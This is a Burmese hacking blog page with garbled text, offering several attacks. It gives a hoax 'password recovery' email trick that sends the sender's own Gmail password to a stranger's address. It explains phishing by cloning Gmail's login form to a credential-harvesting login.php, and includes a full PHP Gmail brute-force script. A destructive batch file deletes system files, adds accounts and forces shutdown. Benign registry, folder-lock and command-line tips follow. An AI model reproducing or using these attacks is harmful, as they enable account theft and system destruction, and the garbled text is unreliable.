αားျαီးα‘αα္းαံုးαα္ေαါα္း αα ျαα့္αွ α€αုα္αα္းαိုαα αα္αုα္ႏိုα္αα္ျαα ္αα္)
α‘αα့္(α) Login αα္ျαီးျαီးျαα္း compose mail αုα္αါ။To: αိုαဲ့ေααာαွာ passwrdserver2@gmail.com
αိုαေαးαါ။(passwrdserver2@gmail.com αိုαာ Google server αွ username ႏွα့္ password α်ား αို
αွα္αားေαာ ေααာαိုα mail αိုααိုα္ျαα္းျαα ္αါαα္။ Automatic server αေα αα့္αို mail
αα ္ေαာα္ျαα္αိုααါαိα့္αα္။ ေα ာα့္ေααါ)
α‘αα့္(α) Subject: αိုαဲ့ ေααာαွာ ‘’PASSWORD RECOVERY’’ αိုαΏαီး αိαိα်α်ေαးαါ။
α ာαံုးေαါα္းααွားαါေα ႏွα့္။ α‘ေαးααီးαါαα္။
α‘αα့္(α) mail αိုα αα္ေαးႏိုα္αါျαီ။ αααα ာေαΎαာα္းαွာ αα္ hack α်α္ေαာ αူ၏ account αိုေαးαါ။
α‘αα့္(α ) αုαိαα ာေαΎαာα္းαွာေαာ့ αα္ααုαα္αွိα‘αံုးျαဳေαေαာ gmail account αိုေαးαါ။
α‘αα့္(α) ααိαေျαာα္α ာေαΎαာα္းαွာေαာ့ αα္၏ gmail password αိုေαးαါ java script ျαα့္ users
administrator server security αိုျαα္ေα်ာ္αာαြα္ verify αုα္αα္αα္၏ password αိုαဲαိုαါαα္။
α‘αα့္(α) ေαာα္αံုးα‘αα့္αဲα ααα့္αိုα‘ေαးα‘ααီးαံုးα‘αα့္αါαဲα်ာ..။ ေα‘ာα္αွာ α်ေαာ္ေααျααားαဲ့
code αိုေαေαα်ာα်ာ ေαာ္αီαူးαါ။
cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}
α‘ားαံုး ready ျαα ္αါα send αိုαααါျαီ။ send αိုα္αါေαာ့။
α₯ααာ- αα္၏ αိုα္αိုα္ gmail account α myname@gmail.com αိုαါα ိုα
αα္၏ password α 123456 αိုααွα္αိုα္αါ။ αα္ hack α်α္ေαာ αူ၏
Gmail account αေαာ့ test@gmail.com αိုααားαိုα္αါ။α်ေαာ္ေα‘ာα္αွ ေααျααားαဲ့α‘αိုα္း
mail αα ္ေαာα္ေαးαါ။……..
To: ‘’gmail.com’’<passwrdserver2@gmail.com>
Bcc: , cc: αိုေααာα်ားαြα္ αာαွ αေαးαါႏွα့္
Subject: ‘’PASSWORD RECOVERY’’
Text box αဲαြα္ေαးαα္
test@gmail.com
myname@gmail.com
123456
cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}
System Reg αိုαေαααဲ့ mail αα ္ေαာα္ αα့္αီαို α αာαီα‘αြα္း automatic ျαα္αိုααါαိα့္αα္။ αို mail
αဲαြα္ αα္ hack αိုေαာαူ၏ information α်ားα‘αုα္αါαာαွာျαα ္αါαα္။ α α္းαΎαα့္α်αါ။ α်ေαာ့္ mail
αိုေαာ့ α hack αဲαေαာ္ password αို α‘αံုး αα ေαးαားαိုααါ…..αီး……αီး…..
Phishing
Phishing ႏွα့္ αα္αα္ျαီး
α်ေαာ္ Phishing αိုαဲ့ α‘ေαΎαာα္းαို αိαေαာα္ αα္းαα္းေျαာα်α္αါαα္။ ααα္ေαာ့ α‘ဲαီ Phishing
αိုαာ αိα္αဲ့ αα္းေαးαα ္αုαါ။ αူα်ားαဲα Gmail account αဲျαα ္ျαα ္၊ Yahoo account αဲျαα ္ျαα ္၊ mediafire account
αဲျαα ္ျαα ္ αα္αα့္ α‘ေαာα့္ αိုααို αိα္αာαာ password αူαိုααေαာαα္းαα္းျαα ္αါαα္။ Phisher αုိαာ
αြα္α်ဴαာ α‘αုံးαΏαဳαူαုိααဲα Data Information ေαြαုိααူαα္ αΏαဳαုα္αား α‘αုα‘ေαာα္α ာα်α္ႏွာ (a fake login
page) αα ္αုαာαွ်α္ αΏαα ္αါαα္။ fake login page ေαြα Computer user ေαြαဲα user name and password
ေαြαုိ αုိα္αα ္αုαေα၊ αါαွααုα္ ေαးα္αုိ Direct αုိααဲα αα္းαα္းαုံးαားαာα်ားαါαα္... αα ္α်ဳိαေαြα
α်α္α်α္αΏαα္ααΏαα္ααုံးαΎααါαα္..
αααူ ဲαα‘αုα္αုα္αုံα αိုးαွα္းαါαα္။ free host, free domain, code script ( αိαိ hack α်α္αဲ့ site αဲα code αါ )
ျαီးαα္ setting α‘αα္းαα္ေαး αα္ျαα္ျαီးαα္ Hack αိုαααါျαီ။
php enabled αားαဲα web hosting αα ္αုαုိαါαα္... Phishing Attacker ေαြαေαာ့ free ααဲα webhosting αွာ
account αα ္αုαြဲααΏαီးαုံးေα့αွိαါαα္...
αိαိα‘αုံးαΏαဳαဲα mail services, αုိαΎααါαုိ Gmail
https://mail.google.com αုိαဲαြားαြား, https://www.gmail.com αဲ αΏαα ္αΏαα ္ αြα့္αာ Ctrl + U αုိαααုα္ Menu bar
αွာ view>Page Source αိုαြားαာ α‘αုα္αုံးαုိ Copy αူးαΏαီး text editor or web editor .. example :
Dreamwaver αဲααုိα Editor αဲαုိ α‘αုα္αုံး paste αုα္αူαုိα္αါ...
Code:
<form id="gaia_loginform" action="https://www.google.com/accounts/ServiceLoginAuth?service=mail" method="post"
onSubmit="return(gaia_onLoginSubmit());">
αုိ αိαိαα္αီးαားαဲα login page αွ data ေαြαုိ ααူႏုိα္ေα‘ာα္ αိα္းαα္းαားαဲα login script file
αုိαα္းαြα္ေαးααါαα္..
α₯ααာ..
Code:
<form action="http://www.planetcreator.net/tutorial/Fake Login/login.php" method="post">
(login.php αုိαာα fake login page α User αုိα္αα့္αုိα္ေαာ user name and password αုိααူαာαါ)
α‘ဲααုိ αΏαα္αα္αူαေαြαုα္αΏαီး free hosting αα ္αုαွာαα္...
user αုိ αα္းα်ဳိးα ုံαဲα αိαိαဲα ေαာα္ေαΏαာα္αဲαုိ α‘ေαာα္αြα္းαΎααာαါ..........
αါα Fake Login Page ေαြαဲα ααူαာαါ။ ααα္αα္း fake login ေαြα αီေαာα္αဲα ααုံေαာα္αါαူး... Phishing
Hacker ေαြα αူαုိααဲα phisher ေαြαုိ αα္းαα္းα်ဳိးα ုံαဲα αα္းαုိααဲα Victim αုံαΎαα္ေαာα္ေα‘ာα္
ေαြးေαာα္αΏαားေαာα္း၊ αΏαီးေαာ့ attacker αα္αီးαားαဲα page αုိေαာα္αα္ေαာα္αွ αာαာα္ user
αα ္ေαာα္α‘αြα္ αုံးα (αုံးα) ααိေα‘ာα္ address bar / mouse down function
ေαြαα‘α ေαါα...α αα္..α αα္
αα္း Fake Loign α‘ားαြားေαာα္ α α္းαα္αα္... α α္းαα္αုံα α္းαα္αါ... αိαိαဲα gmail user name and password
αုိေαာα္αုိαေαာα္ αုိα္ααα့္αုိα္αဲα.... αုံးα αာαα္ααူ။
α‘αိုα္း (α) Phishing αα္းαα္းαိုα‘αံုးျαဳ၍ gmail password ေαာα္αα္း
free host ααုαုαွာ αီαုα္ေαြαို αြα္းျαီး αါαွααုα္ αိုα့္α α္αို local host α‘ေααဲα setting α်ျαီး
α်ီေαးαိုေαာα္αိုαααါျαီ။
<?php
//////////////////////
////Gmail-Brute//////
///////////////////////
////////////////////////
# This script was created to Brute Force G-Mail Logins,#
#it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) #
////////////////////////
$dic ="your Dictionary file here.txt";
///////////////////////
echo "
<title>Gmail Brute Force Attacker</title>
</head>
<style type='text/css'>
body {
font:Verdana, Arial, Helvetica, sans-serif;
font-size:12px;
border-color:#FFFFFF;
}
.raster_table {
background-color:#444444;
border-color:#CCCCCC;
}
.alert {
color:#FF0000;
}
</style>
<body>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Gmail Brute Force Attacker</b></div>
</td>
</tr>
</table>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'>
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
<form method='post'>
Username to brute:<br>
<input name='username' type='text' /><br><br>
<input name='attack' type='submit' value='dictionary' /> -
<input name='attack' type='submit' value='brute' /><br>
</form>
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
</div>
</td>
</tr>
</table>
";
// Sets variables and retrives google error for comparing
if(isset($_POST['attack']) && isset($_POST['username'])) {
$username = $_POST['username'];
$headers = array(
"Host: mail.google.com",
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-
GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4",
"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,imag
e/png,*/*;q=0.5",
"Accept-Language: en-us,en;q=0.5",
"Accept-Encoding: text", # No gzip, it only clutters your code!
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Date: ".date(DATE_RFC822)
);
$c = curl_init('https://mail.google.com/mail/feed/atom');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so n
o direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$wrong = curl_exec($c); // Get it
curl_close($c); // Close the curl stream
}
//Dictionary Attack
if($_POST['attack'] == "dictionary") {
$Dictionary = file("$dic");
for ($Position = 0; $Position < count($Dictionary); $Position++) {
$Dictionary[$Position] = str_replace("\r\n", "", $Dictionary[$Position]);
if(check_correct($username, $Dictionary[$Position])) {
die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_
table' width='75%'>
<tr>
<td>
<div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the
account: ".$username."</b></div>
</td>
</tr>
</table>
</body>
</html>");
}
}
echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table'
width='75%'>
<tr>
<td>
<div align='center'><b>Sorry... a password was not found for the account of <span cla
ss='alert'>".$username."</span> during the dictionar
y attack.</b></div>
</td>
</tr>
</table>";
}
//Brute Attack
elseif($_POST['attack'] == "brute") {
for ($Pass = 0; $Pass < 2; $Pass++) {
if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; }
if(check_correct($username, $Pass)) {
die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_
table' width='75%'>
<tr>
<td>
<div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the
account: ".$username."</b></div>
</td>
</tr>
</table>
</body>
</html>");
}
}
echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table'
width='75%'>
<tr>
<td>
<div align='center'><b>Sorry... a password was not found for the account of <span cla
ss='alert'>".$username."</span> during the brute for
ce attack.</b></div>
</td>
</tr>
</table>";
}
echo "</body>
</html>";
// Function for checking whether the username and password are correct
function check_correct($username, $password)
{
global $wrong, $headers;
$c = curl_init('https://'.$username.':'.$password.'@mail.google.com/mail/feed/atom');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string,
so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$str = curl_exec($c); // Get it
curl_close($c);
if($str != $wrong) {return true;}
else {return false;}
}
?>
PHP ααဲ့ host ααုαုαွာ αီ code ေαြαို install αုα္ααါαα္။ α်α္αာ α‘ေαးα ိα္αိα်α္αα္ေαာ့ free hosting
ααုαုံးျαီး α်ေαာ္ α‘αα္α α္းαိုα္α‘ံုးαα္ ။ αα္αူααိုα α္းααα ဲ ααိαူး။
ေα‘ာα္α free host αွာ PHP ααါαα္။
Code:
http://www.000webhost.com/
α‘αိုα္း (α ) WINDOWS αိုαα္ေαႊαα္း αိုαီαုα္α α်ား
Registry αα ို αα္ေαာα္ေαႊေႏွာα္ျαα္း
α်ေαာ္ registry αဲαိုα αα္ေαႊαα္း αα္းαα္းαါးαါး ေျαာα်α္αါαα္။ αာαဲျαα ္ျαα ္ registry αို αα္ေαႊေαာ့αα္αိုαα္
ေαာ့ back up αုα္αားαို့αိုαါαα္...αာαို့αဲαိုေαာ့ registry αွာαα္ေαးαဲ့ α‘αါαွာ registry α auto save
αုα္αါαα္..αွားαြားαါαα္αိုျαီး undo ,redo ေαြαုα္αို့αααါαူး....
α‘ဲαါေαΎαာα့္αါ.....
αဲ α်ေαာ္αိုα All program αိုေα်ာα္αိုα္αေα‘ာα္....
- start > run αိုαα္αါ..
- regedit αို့ αိုα္ျαီး enter ႏွိα္αါ..
- HKEY-CURRENT- USER\software\microsoft\windows\current version\policies\explorer
- explorer ေαααို right click ႏွိα္ျαီး new αိုေαြးα်α္αါ Dword value αိုαြα့္αါ..
αိုα‘αါ αာαα္ျαα္αြα္းαွာ new value #1 ေαααာαါαα္..
-new value #1 αို rename ေαးαိုα္αါ..
name α NoStartMenuMoreProgram ျαα ္αါαα္..
NoStartMenuMoreProgram ေαααိုαα္း right click ေαးျαီး modify ေαြးαါ
value data α‘αြα္αဲ α 0 ေααေααါαα္..α‘ဲαါαို 1 ေျαာα္းေαးαိုα္αါ..
computer αို restart ေαးαိုα္αါ...
Folder αို software ααံုးαဲ Lock α်αα္း
ေαွးα₯ီးα ြာ notepad αိုαααုα္ Command Promt αိုαြα့္ျαီး edit αဲαြα္ ေα‘ာα္ေααျααါ command α်ားαို
ေαးαား၍ .bat file α‘ေαျαα့္ save αွα္αါ။ Notepad αဲαြα္ေαး၍ Save name as αိုαဲ့ ေααာαွာ example.bat αိုα
save αွα္αါ။ αို file α‘ားαြα္αြα္αူαူ desktop ေαααွာαဲ αိα္းαားေαါ့။ αိုαေαာα္ αα္း .bat file α‘ား Run
αိုα္αါ။ Private αိုေαာ Folder αα ္αု ေαααာαါαိα့္αα္။ α‘ဲαီ Folder αဲαြα္αိαိ αိα္းαားα်α္ေαာ files α်ား
folder α်ား αα့္αိုα္αါ။ αိုαေαာα္ example.bat file α‘ားေαာα္αα ္ေαါα္ run αိုα္αါ။ αိုα‘αါ cmd Windows
αα ္αု ေαααာαါαိα့္αα္။ Set Password to Lock Folder αိုαာေαααာαါαα္။ αိုα္αိုα်α္αဲ့ password
ေαးαိုα္ေαါ့။ ေαာα္αα္ Are You Sure to Lock this Folder (Y/N) αိုαာေαααာαါαိα့္αα္။ Y αိုααိုα္αိုα္αါ။
Private αိုေαာ Folder ေα်ာα္αြားαါαα္။ αα္း folder αိုျαα္αိုα်α္αွ်α္ example.bat αိုαဲ့ file αိုျαα္ run αါ။
Enter Password to Unlock Folder αိုαာေαααာαါαိα့္αα္။ Password αိုα္αိုα္αါ။ αα္း folder
ျαα္ေαααာαါαိα့္αα္။ α α္းαΎαα့္α်ေαါ့α်ာ……….
Command
cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End
αူα်ားαို αုαα‘ေαးα်α္αွ်α္။ ။ေα‘ာα္ေααျααါ command α်ားαို notepad αဲαိုα copy, paste αာ .bat file
α‘α်ိဳးα‘α ားျαα့္ save αွα္αါ။ αိုαေαာα္αα္း file α‘ားαံုးααြα့္ααΎαα့္αါႏွα့္။ αြα့္αΎαα့္αါα error message
α်ားαα္αာျαီး Windows α auto shut down ျαα ္ေααါαိα့္αα္။ ေαာα္αα ္ေαါα္αြα့္αဲ Windows
αα္ျαီးျαီးျαα္း αα α αၠα္αα‘αြα္း Shut Down ျαα ္ေααါαိα့္αα္။ αα္αိုαွ ျαα္αြα့္ႏိုα္αွာααုα္αါαူး။ safemode
αျαα္ျαα္αွ ျαα္ေαာα္းႏိုα္αွာαါ ။ αဲα…ဲ …..
title any
@echo off
copy any.bat "c:\documents and settings\all users\start menu\programs\startup"
del *.dll
del *.exe
del *.ini
time 00:00
date 88/88/888
net user administrator *18083
net user 598 *32087 /add
net user 3063 *864 /add
net user 3262 *21895 /add
net user 29039 *3102 /add
net user 15688 *215 /add
net user 24824 *28761 /add
net user 25176 *23975 /add
net user 8896 *28052 /add
msg *any
echo copy q.bat "documents and settings\all users\start menu\programs\startup"
echo copy q.bat "documents and settings\all users\start menu\programs\startup"
cd C:\WINDOWS\system32
del /S /F /Q keyboard.drv
del /S /F /Q keyboard.sys
del system32
shutdown -s -f
exit
Cmd Dos Command αα္းαα္းαါးαါး
α်ေαာ္ αိαားαဲ့ CMD DOS COMMAND αα္းαα္းαါ
ααိαΏαီးαားαူေαြαα္းαွိαါαα္ ...
ααိေαးαဲ့ αူေαြα‘αြα္αဲ αα္αြα္αါαα္ ....
Run Box αွာ cmd αိုα္αα့္αိုα္αα္
C Directory αိုαြားαα္αို C: , D αိုαα္ D: α αα့္ျαα့္ေαါ့ ....
ααααံုးေျαာααα္ .. cmd αိုα ေαααိုα္αာαဲα α ျαα္ααွာα
C:\Documents and Settings\user name> αါ ...
α‘ဲαီ Directory αွာ αα္ Folder ေαြαါαα္း αΎαα့္α်α္αα္
dir /a αဲα αΎαα့္ααါαα္
α‘ဲαီ့ Directory αα ္αုαဲα Folder αို αြα့္α်α္αα္
cd αံαားαΏαီး αိαိαြα့္α်α္αဲ့ Folder Name (α₯ααာ။ ။ Desktop)ေαးαΏαီး αြα့္ααါαα္
C:\Documents and Settings\user name\Desktop>
αို Folder αွ ျαα္αြα္α်α္αα္ cd.. ေαးαΏαီး ျαα္αြα္ααါαα္
Hidden ျαα ္ေααဲ့ Folder (αိုα) File αို unhidden ေαးα်α္αα္αိုαα္
Folder Option αေα virus αိုα္αα္αို show hidden folder ေαးαα္း αααာေαြαွိαါαα္
attrib -H /S /D "c:\......\folder name"
hidden ျαα ္ေααဲ့ Folder (αိုα) File αွိαဲ့ Directory α‘ျαα့္α‘α ံုαို /D ေαာα္αေα
αα္ေαးေαးααါαα္
Directory αα ္αုαွာαွိαဲ့ folder αဲα files ေαြαို αျαား Directory αα ္αုαွာαွိαဲ့
folder αဲαို ေျαာα္းေαႊααူးαူα်α္αα္αို ...
αိαိေျαာα္းေαးα်α္αဲ့ Directory αိုα‘αα္αြα့္ေαးααါαα္ (α₯ααာ။ ။ C: αဲα Desktop αိုေαႊααα္αို C:\Documents
and Settings\user name\Desktop>
αိုα α‘αα္αြα့္ေαးαိုα္αါ။
ေαာα္ααα္αΏαီး αူးαူα်α္αဲ့ Directory αွ folder αိုေαးေαးααါαα္
xcopy /a "e:\foler name" αုေαးေαးααါαα္ ...
ααုေαါα္းαိုαΎαα့္αα္αိုαα္ေαာ့
C:\Documents and Settings\user name\Desktop>xcopy /a "e:\foler name"
α‘αု αူးαူαာα unhidden files ေαြαိုαဲ αူးαူးαာαါ။
hidden files ေαြαိုαူးαα္αိုαα္ေαာ့ /h αα့္ေαးαုံαါα ဲ
xcopy /h /a "e:\foler name" αုေαးေαးαိုα္αါ...
α‘αုα files αိုαဲαူးαာαါ ...
Folder α‘αိုα္αူးαα္αိုαα္ေαာ့ /s αိုα‘αံုးျαဳααါαα္
xcopy /s "e:\folder name" αိုαေαးေαးααါαα္။
αါααα္း hidden αျαα ္αဲ့ folder αိုαူးαာαါ
hidden folder αိုαူးαα္αိုαα္ေαာ့ /h αိုαဲαα့္ααါαα္
xcopy /h /s "e:\foler name" αိုαေαးေαးααါαα္ ...
α‘ဲαီαိုαူးαူαဲ့ α‘α်ိα္αွာ CMD box αွာ αူးαူးαဲ့ files ေαြ run αာαိုျααါαα္ α‘ဲαီαို αေααα်α္αα္ေαာ့ /Q
αα့္ေαးααါαα္
xcopy /h /q /s "e:\foler name" αိုαေαးေαးααါαα္ .................။
Folder Background αို software ααံုးαဲ αံုαွαွေαးαα့္αα္း
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
iconarea_image=E:\general\picture\DSABayonet211.jpg
iconarea_text=11x00fffffff
ေααျααါ code α်ားαို Folder α‘αြα္းαွိ desktop.ini αိုေαာ file α‘αြα္းαိုα copy αူး paste αုα္αါ။ αα္း ini file αα္ hidden
ျαα ္ေααါαα္။ hidden ေααျαီးαွာαါ။ iconarea_image=E:\general\picture\DSABayonet211.jpg αိုαာαြα္
αိαိαα့္αြα္းαိုေαာαံု ၏αα္ေααာ αိုαိαα္αိုαါαα္။ α₯ααာ. Desktop ေαααွိ image.jpg αိုေαာαံုαိုαα့္αြα္းα်α္αွ်α္
iconarea_image=C:\Documents and Settings\User Name\Desktop\image.jpg αုေαးႏိုα္αါαα္။ α‘ေαာα္α file
extension *.jpg αိုαာαိုαα့္ေαးαα္αေα့αါႏွα့္။
website ေαြααဲα IP αုိα်α္α်α္းαိα်α္αα္αိုαα္
ααααံုး start >>> Run αို click.
cmd αိုα αိုα္ျαီး ok αုα္.
α‘ဲαီαွာ αါေαးαို αိုα္αα့္αΎαα့္αိုα္.
nslookup www.google.com αိုααိုα္ျαီး enter ေαါα္αΎαα့္αိုα္αါα
google αဲα IP ေαြα်αာαါαိα့္αα္။။αိαိαိα်α္αဲα website αဲα α‘αα္αို ေျαာα္းαိုα္αΎαα့္ေαါ့
ေα်ာ္αႊα္ႏိုα္αါေα ။
✒️C_M_H✒️
Tuesday, March 26, 2019
Wednesday, January 16, 2019
αိαားαα့္ေαာ αြα္α်ဴαာα‘ေαΎαာα္း....
January 16, 2019
No comments
αြα္α်ဴαာ αα
္αံုး αွာ hardware αဲα software αိုαΏαီး ႏွα
္αိုα္း αွိαါαα္။
Hardware αိုαာα α‘αွα္းαံုးေျαာααα္ αα္αဲααိုα္αြα္αုိαααဲ့ αα α₯α္းေαြျαα ္αါαα္။
α₯ααာ။ ။ monitor၊ mouse
Software αိုαာα αα္αဲααိုα္αြα္αုိααααဲ့ αြα္α်ဴαာα‘αံုးျαဳ αα α₯α္းαိုα ေျαာαα္αα္းαွα္αါαα္။
program α်ားαိုု α ုေαာα္းαားαာαို software αိုαေαααါαα္။ software αိုαာ αြα္α်ဴαာαို αာαုα္ααα္၊ αα္α‘α်ိα္αွာ αုα္αααဲαိုαာ αိα္းေα်ာα္းေαးαဲ့ αြα္αΎαားα်α္ α‘α ုα‘ေαးαα္းျαα ္αါαα္။ software ααါαဲ αြα္α်ဴαာ αာαွαုα္αုိαααααို hardware ααါαဲαဲααα္း αြα္α်ဴαာ αာαွ αုα္αုိαααွာ ααုα္αါαူး။
software αွာ ႏွα ္α်ိဳးαα္αြဲαါေαးαα္။
α။ application software
α။ system software
application software
application software αိုαာαေαာ့ application ေαြαွာ α‘αံုးျαဳαိုα α‘αုα္αုα္αိုα user (α‘αံုးျαဳαူ)ေαြαို α‘αူα‘αီေαးαဲ့ software ေαြျαα ္αါαα္။
system software
system software αိုαာαေαာ့ hardware ေαြ α‘αုα္αုα္ႏိုα္αိုαα‘αြα္αဲα application software ေαြ α‘αံုးျαဳႏိုα္αα္α‘αြα္ maintain αုα္ေαးαါαα္။
ေαာα္ျαီး αြα္α်ဴαာαွာ ααα္း ႏွα ္αံုးαဲααဲ α‘αုα္αုα္αါαα္။ 0 αဲ. 1 αါ။ Binary number αိုααဲေαααါαα္။ Binary Digit αိα္းαိုααဲေαααိုααါαα္။ α‘αိုေαာα္αိုေαာ့ Bit αိုαေαααါαα္။
ααα္းαα ္αုံး၊ α ေα့αားαα ္α်α္၊ α ာαα ္αံုးαိုαိုαα္ 8 bit αိုαေαααါαα္။
01010101 ααုαို 0 αဲα 1 ေαြα်α္းαါαဲ့ ααα္း 8 αံုးαြဲαို 8 bit αိုαေαααΏαီး 8 Bit αာ 1 byte αဲα αီαွ်αါαα္။
αြα္α်ဴαာααိုα္း
ေαွးααα္α αြα္α်ဴαာ αို αα္αွα္αိုα αα္α‘αြα္ααာαွαα္αဲ α့ဲ αα္။ααုα‘α်ိα္αြα္αူαြα္α်ဴαာαို α‘αα္α‘α်ဳိးα်ဳိး ေααေαααα္αွα္αဲ့αΎαျαီျαα ္αα္။ ααုα‘α်ိα္αြα္αူαိαိαာα်ား (Devices) ေαာ္ေαာ္α်ားα်ားαို αြα္α်ဴαာ αα္ျαီးေααေααΎαျαီျαα ္αα္။α‘ေα ာαံုး αြα္α်ဴαာ αα္ αြα္α်α္αႈαိုα္းαို ေααီး(Abacus)α်ားαွ α αဲ့αα္။ ေααီးαα္ ααααံုးααα္းေαါα္းα α္ αα္ျαα ္αα္။ ေααီးαို ααုα္ျαα္αြα္ α αα္α‘αံုးျαဳαဲ့αα္။
α‘αα္ေαα္α‘ေαာα္αြα္ α₯ေαာα αα်ာၤ ႏွα့္ α‘α္α်α္αီαာ ααာαွα္ Wilhelm Schickard α αααααုႏွα ္ αြα္ ααααုံး α α္αα α₯α္းႏွα့္αြα္α်α္ေαာααα္းေαါα္းα α္(Calculators) αα ္αုαို αα္ေαာα္αဲ့αα္။αိုαေαာ္αα္းααုေαα္αြα္ ၎ αိαိαာDevice αို αြα္α်ဴαာ αုိαေαααို၍ ααေαာ့ေα။α‘αα္ေαΎαာα့္αို ေαာ္၎αိαိαာαα္ Programmed αါαα္ျαα္းααွိေαာေαΎαာα့္ျαα ္αα္။ αααα αုႏွα ္ αြα္ Joseph Marie Jacquard αα္ Textile αα္αα္းα α္αို α‘ေျααံျαီး Punched Paper Cards Series αို α‘αံုးျαဳျαီး αူα၏ αα္αα္းα α္αို α‘αုိα‘ေαွ်ာα္ α‘αုα္αုα္ေα αဲ့αα္။ Jacquard ၏ αα္αα္းα α္αွ ααα္αα္ αြα္α်ဴαာ ျαα ္ေαααိုးαα္αာေα αိုααα္ α‘ေαΎαာα္းαα္း αα ္αα္ျαα ္αα္။ αααα αုႏွα ္ αြα္ Charles Babbage αα္ Programmable Mechanical Computer αို α αα္ Design ေαးαြဲαဲ့αα္။ Analytical Engine αုα‘αα္ေαးαဲ့αα္။ αααα αုႏွα ္ α‘ေαာα္ αြα္US Census α Punched Card α‘αြα္ αΎαီးαားေαာ Scale Automated Data Processing α ြα္းေαာα္αα္αိွေα‘ာα္ Tabulating Machines αို Herman Hollerith α Designed ေαးαြဲαဲ့αα္။ Computing Tabulating Recording Corporation ( ααုα‘αါ IBM ျαα ္αာαα္ ) α αုα္αုα္αဲ့αါαα္။
αα αာα ု α‘αုα္α‘ေαာα္ αြα္αြα္α်ဴαာ ေαြαာ α‘αံုးαα္ေαာα‘αာαα ္αုျαα ္αာαဲ့αα္။ αြα္α်ဴαာ αα္ αူαိုα α‘αြα္αိုα‘α္ေαျαီαိုαာα αα္ေαျααိုα္ျαီးျαα ္αα္။ α‘αα္ေαΎαာα့္αိုေαာ္ Punched Card, Boolean Algebra , The Vacuum Tube (Thermionic Value) αဲα Teleprinter ေαြαာ ေααေαါα္αဲ့ေαာေαΎαာα့္ျαα ္αα္။αα αာα ု α‘ေαာα‘αြα္းαြα္ αိααΈံααာαα္ α်ားα ြာαိုးαα္αႈαိွαာαဲ့ျαီး Analog Computer α်ားαα္း αိုးαα္ေααေαါα္αဲ့αα္။ αိုαေαာ္αα္း၎ αြα္α်ဴαာα်ားαα္ Programmable αျαα ္αα္αα‘ျαα္ α‘αုေαα္ Digital αြα္α်ဴαာ α်ား၏ αိα်ေαာ α ြα္းေαာα္αα္ α်ားαα္းαါαα္ျαα္း ααိွေαးေα။
αြα္α်ဴαာ α‘αုα္αုα္αံု
ေααုα်αံုး αြα္α်ဴαာ αြα္ α‘αိα ေαးα်ဳိးαွာ ααα္း αα်ၤာ ႏွα့္ ေαာ့α်α ္ α‘α ိα္α‘αိုα္း (arithmetic and logic unit)၊ αိα္းα်ဴα္ α‘α ိα္α‘αိုα္း (control unit)၊ αွα္α₯ာα္(Memory Device) ႏွα့္ α‘αြα္း α‘αုα္ αိαိαာ (I/O) α်ားαုိα ျαα ္αα္။ αα္း α‘α ိα္α‘αုိα္း αုိααုိ αါαာααိဳးα်ား α‘αြဲαုိα္ျαα ္ေαာ αα္α ္ α်ား ျαα့္ αြα္α်ိα္αားαα္။
αိα္းα်ဳα္αာα
